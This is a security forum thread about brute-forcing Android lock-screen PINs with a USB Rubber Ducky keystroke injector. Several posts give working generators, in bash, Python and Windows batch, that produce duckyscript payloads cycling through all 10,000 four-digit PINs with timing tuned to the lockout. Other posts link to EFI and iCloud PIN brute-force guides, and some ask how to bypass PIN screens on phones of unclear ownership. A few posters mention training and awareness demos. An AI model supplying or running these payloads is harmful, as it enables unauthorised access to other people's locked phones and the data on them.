Bountyhunter50 Posted January 9, 2013

I saw Darren's bash code (I'm not gonna lie, I was intimidated), but after running it, COOL!!! Now I just need to find a willing test subject (locked in for 2 yrs on my iPhone).

Martinus101 Posted January 26, 2013

Love the shows!

Question: Is this the only way to do this? I would think to connect the phone to a normal computer and run the needed scripts from there will do the same?

Question: What kind of software OS is running on the chip?

no42 Posted January 26, 2013

Q1: No, see above.

Q2: The chip is a micro-controller, not an actual full-blown OS; it's pre-programmed with a set of instructions triggered/executed by a series of interrupts.

beka Posted January 30, 2013

Just playing around with the Android 4 digit pin code and a Samsung Galaxy S2. I noticed the S2 (maybe it depends on the version) didn't respond to the ENTER key on an external keyboard while in "standby" mode. It will respond to the ESC key, so if you have this problem change the DELAY 5000\nENTER to DELAY 5000\nESC.

If you want to play around with the rubber ducky script, first give it a try with an external keyboard. Maybe your timeout settings are different so you need to change the delay settings.

ed_ed Posted February 13, 2013

This could work incredibly well when "Quick unlock" is enabled in Android's security settings, anyone tried it out yet?

JDale Posted February 13, 2013

Been trying to use the Ducky with the payload script to brute force a 4 digit phone lock, it times out after 3,000 attempts of 10,000 ???

Any thoughts as to why it stops at 3,000 when the script is for 10,000?

Thanks in advance

soni.pc Posted November 2, 2013

Can someone please tell me how to insert the payloads in the USB Rubber Ducky, and does anyone have the payload for EFI PINs (4 digits)?

Hak 5 ish Posted April 23, 2014

> Can someone please tell me how to insert the payloads in the USB Rubber Ducky, and does anyone have the payload for EFI PINs (4 digits)?

I'm looking for the same. I have the code for Teensy 3, but I can't seem to get the payload to work correctly on the rubber duck. These links list the codes used for the Teensy 3 for EFI brute forcing and iCloud pin brute forcing. Can someone PLEASE take a look at it and see if it needs to be edited to work on the rubber ducky?

http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/#UPDATE
http://orvtech.com/en/howto/ataque-fuerza-bruta-pin-icloud/

S3V3N Posted June 18, 2014

The adapter that will work for the iPhone is called the Apple Camera adapter. I have a few Apple devices, and it works for all of them. I have yet to try the iPhone5 though, as this requires the new camera adapter. Now we just need to get the timing/code corrected, as the iPhone is a bit different than the Android.

Awesome Work!! Keep it up Darren!!

S3V3N Posted June 18, 2014

Part Number for iPhone up to 4S: MC531ZM
Part Number for iPhone 5: MD821ZM

dataghost Posted January 4, 2015

To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

port install gsed

then:

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

Not sure what's going wrong with cygwin?

How can I modify this script to put a delay between each key stroke? So basically enter 0, delay 500ms, enter 0, delay 500ms, enter 0, delay 500ms, enter 1, etc.

Ninjalizard Posted March 5, 2015

Hey all, I'm trying to execute this payload on my ASUS tablet and it doesn't respond to ENTER. As suggested, I've tried ESC along with OK, SPACE, RETURN, SUBMIT and TAB... any suggestions would be appreciated!

Jhall1 Posted March 20, 2015

Hi, great Ducky payload!

This works great on my Android platform of 4.4.2 Samsung, but is there any update or way through more recent Android versions? I have tested it on the HTC One M8 and the script begins to run and navigates to the pin screen, but the keypad will only work from physical access to the phone and not by the ducky or USB keyboard.

Any advice or tips would be great.

Jake

shamwow Posted July 7, 2015

> I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
>
> I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
>
> With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
>
> Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
>
> echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

Will this script work against Windows 10 PINs as it is?

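The lockout arithmetic in the post above (5 tries, then a 30 second timeout) can be checked and extended from the defender's side. The Python below is an added example, not code from the thread; the escalating-timeout and wipe-after-N policies and all function names are assumptions used to show how those settings change the numbers.

```python
# Added example: models how a PIN lockout policy bounds exhaustive guessing.
# Only "5 tries, then 30 s" comes from the thread; other policies are assumed.

def exhaust_seconds(digits, tries_per_lockout=5, lockout_s=30, per_try_s=0.0):
    """Worst-case seconds to enter every PIN under a fixed lockout timeout."""
    keyspace = 10 ** digits
    lockouts = keyspace // tries_per_lockout
    return lockouts * lockout_s + keyspace * per_try_s


def escalating_exhaust_seconds(digits, tries_per_lockout=5, base_s=30, cap_s=3600):
    """Same keyspace, but every lockout doubles the timeout up to a cap.

    Hypothetical policy, shown to compare against the fixed 30 s timeout.
    """
    keyspace = 10 ** digits
    total, delay = 0, base_s
    for _ in range(keyspace // tries_per_lockout):
        total += delay
        delay = min(delay * 2, cap_s)
    return total


def success_probability_before_wipe(digits, wipe_after):
    """Chance a uniformly random PIN is guessed before a wipe-after-N limit."""
    keyspace = 10 ** digits
    return min(wipe_after, keyspace) / keyspace


if __name__ == "__main__":
    for digits in (4, 5, 6):
        fixed_h = exhaust_seconds(digits) / 3600
        esc_h = escalating_exhaust_seconds(digits) / 3600
        print(f"{digits}-digit PIN: fixed 30 s lockout {fixed_h:,.1f} h, "
              f"doubling lockout capped at 1 h {esc_h:,.1f} h")
    # A wipe threshold caps the attacker's odds regardless of patience.
    print("4-digit PIN, wipe after 100 tries:",
          success_probability_before_wipe(4, 100))
```
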
theGANOUSH Posted August 27, 2015

If anyone is having problems with the bash script, I have written something similar in Python. I mostly use the Raspberry Pi to do all my encoding. This script will inject 20 of the most common pin codes first, and then brute force afterwards.

#!/usr/bin/python

defaultList = ['1234', '1111', '0000', '1212', '7777', '1004', '2000', '4444', '2222', '6969', '9999', '3333', '5555', '6666', '1122', '1313', '8888', '4321', '2001', '1010'];

def main():
    fileOpen = open("android_payload.txt", "w+")
    fileOpen.write("DELAY 5000\n")
    for x in defaultList:
        fileOpen.write("STRING %s\n" % x);
        fileOpen.write("ENTER\nDELAY 500\n")
    for w in range(0,10):
        for z in range(0,10):
            for y in range(0,10):
                for x in range(0,10):
                    fileOpen.write("STRING %d%d%d%d\n" % (w,z,y,x))
                    if (x % 2) == 0:
                        fileOpen.write("ENTER\n")
                    fileOpen.write("ENTER\nDELAY 500\n")
    fileOpen.close()

main()

shrekthemp Posted October 2, 2015

I am new to this program.script and USB Ducky. We use Windows. I went to the online tool USB ducky toolkit to implement the code referenced above. Can someone help me recode it to work in the ducky toolkit? I would like to show this exercise on our training phones in class. Thank you.

Mr-Protocol Posted October 2, 2015

What OS are you using? And is it the code from the first post?

The bash code from the first post cannot be directly imported into the online compiler. Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class.

shrekthemp Posted October 8, 2015

"Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class"

I am using it on Samsung note phones with 4 digit pin set. It would be awesome to have you create the bin for me. I still would like to learn how to recreate the script in the toolkit if possible. My issue is the number creation I think.

Thanks

Siem Posted October 15, 2015

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec
ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$
/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE
R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Users\UserName\Desktop

07/07/2012 01:03 AM 165 Android Paths.txt
08/30/2012 08:00 PM 50 Android SDK Path.txt
12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
 3 File(s) 278 bytes
 0 Dir(s) 831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER

C:\Users\UserName\Desktop>

Instead of using Linux terminal, I made a Batch script for this, it does the same thing. Here is the code:

@echo off
setlocal
set NUM=0
set COUNT=0
echo REM Author: Siem>>input.txt
echo REM Idea taken from: Darren Kitchen
echo REM Description: Bruteforcer>>input.txt
echo DELAY 1000>>input.txt
echo.>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt
:START
cls
IF %COUNT% EQU 5 (set COUNT=0 & call :WAIT)
IF %NUM% LEQ 9 (set ZERO=000)
IF %NUM% GTR 9 (set ZERO=00)
IF %NUM% GTR 99 (set ZERO=0)
IF %NUM% GTR 999 (set ZERO=%)
IF %NUM% EQU 9999 (pause & exit)
echo DELAY 500>>input.txt
echo STRING %ZERO%%NUM%>>input.txt
echo ENTER>>input.txt
echo %ZERO%%NUM%
set /a NUM=%NUM% + 1
set /a COUNT=%COUNT% +1
goto START
:WAIT
echo.>>input.txt
echo REM Wait 30 seconds>>input.txt
echo DELAY 30000>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

You can change the delay a bit, I am still testing it, but this echos 0000..9999 without using Linux.

~Siem

adamxk Posted October 17, 2015

Why isn't this on the wiki?

LoreLorm Posted November 5, 2015

Hi, I'm new to the forum and wondered if someone might be able to help me.

I've been trying to get the Android brute force working for an awareness demo; however I'm not having much luck. I ran the bash script on the original post and created a new inject.bin but nothing happens when I insert it into the phone! Any help would be gratefully received.

I have Samsung GT-S5830i Android version 2.3.6

Thanks

kooltrix Posted August 28, 2016

Anyone have any suggestions as to how to keep the phone powered when attempting 5-pin code? Doubt this phone will survive 160+ hours lol

I've tried using a Targus USB Hub, however I don't think the data from the Rubber Ducky can traverse through the hub into the micro USB OTG to USB Android adapter.. unless I'm doing something wrong, which I don't doubt lol

I guess an alternative is to break up the code into smaller chunks.. 00000-09999, 10000-19999, 20000-29999, and so on. Would take forever lol

Any help would greatly be appreciated. Cheers!

Gazeintotheabyss Posted October 20, 2016

Could someone send me the ducky script for this code? I'm having trouble running it on a Galaxy Core Prime.

Mr-Protocol Posted October 20, 2016

The phone may not support USB keyboard or the OTG cable you are using may not be working properly. Try running the duck in a notepad on your computer to see that it is typing things correctly to eliminate that variable.

Gazeintotheabyss Posted October 20, 2016

So I've run the ducky script in notepad and I don't believe the Galaxy Core Prime is compatible. (Doesn't accept a USB keyboard.) Any other suggestions on running a brute force pin hack or maybe another method to bypass the pin screen?